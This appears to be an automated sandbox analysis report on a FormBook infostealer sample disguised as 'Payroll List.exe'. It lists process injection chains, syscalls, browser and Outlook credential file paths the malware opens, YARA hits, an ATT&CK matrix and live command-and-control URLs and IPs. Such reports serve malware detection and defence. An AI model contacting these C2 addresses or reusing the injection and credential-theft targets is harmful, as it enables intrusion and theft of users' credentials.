                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtTerminateProcess: Direct from: 0x77462D5CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Payroll List.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ktmutil.exeThread register set: target process: 7372Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Payroll List.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EB1008Jump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015B106 LogonUserW,0_2_0015B106
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00123D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00123D19
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016411C SendInput,keybd_event,0_2_0016411C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001674BB mouse_event,0_2_001674BB
                Source: C:\Users\user\Desktop\Payroll List.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payroll List.exe"Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0015A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0015A66C
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_001671FA
                Source: Payroll List.exe, eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: Payroll List.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656587643.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292145094.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292344981.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001465C4 cpuid 0_2_001465C4
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0017091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0017091D
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0019B340 GetUserNameW,0_2_0019B340
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00151E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00151E8E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0013DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Payroll List.exeBinary or memory string: WIN_81
                Source: Payroll List.exeBinary or memory string: WIN_XP
                Source: Payroll List.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: Payroll List.exeBinary or memory string: WIN_XPe
                Source: Payroll List.exeBinary or memory string: WIN_VISTA
                Source: Payroll List.exeBinary or memory string: WIN_7
                Source: Payroll List.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00178C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00178C4F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0017923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0017923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560911 Sample: Payroll List.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 30 www.schedulemassage.xyz 2->30 32 www.huiguang.xyz 2->32 34 13 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected FormBook 2->48 52 4 other signatures 2->52 10 Payroll List.exe 2 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Binary is likely a compiled AutoIt script file 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 eLiCpwzRIeWAs.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 ktmutil.exe 13 16->19         started        22 srdelayed.exe 16->22         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 24 eLiCpwzRIeWAs.exe 19->24 injected 28 firefox.exe 19->28         started        process12 dnsIp13 36 www.telforce.one 64.190.63.222, 49741, 49742, 80 NBS11696US United States 24->36 38 migorengya8.click 198.252.98.54, 49725, 49726, 49727 HAWKHOSTCA Canada 24->38 40 6 other IPs or domains 24->40 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Payroll List.exe58%ReversingLabsWin32.Trojan.AutoitInject
                Payroll List.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu0%Avira URL Cloudsafe
                http://www.migorengya8.click/y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dt0%Avira URL Cloudsafe
                http://www.servannto.site/h26k/0%Avira URL Cloudsafe
                http://www.migorengya8.click/y3dc/0%Avira URL Cloudsafe
                http://www.klohk.tech/3m3e/0%Avira URL Cloudsafe
                https://34.92.79.175:198170%Avira URL Cloudsafe
                http://www.futurevision.life/hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dt0%Avira URL Cloudsafe
                http://www.futurevision.life/hxmz/0%Avira URL Cloudsafe
                http://www.telforce.one/ykhz/0%Avira URL Cloudsafe
                http://www.huiguang.xyz/hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dt0%Avira URL Cloudsafe
                http://www.d63dm.top/rqnz/0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt0%Avira URL Cloudsafe
                http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt0%Avira URL Cloudsafe
                http://www.d63dm.top/rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dt0%Avira URL Cloudsafe
                http://www.mcfunding.org/0598/0%Avira URL Cloudsafe
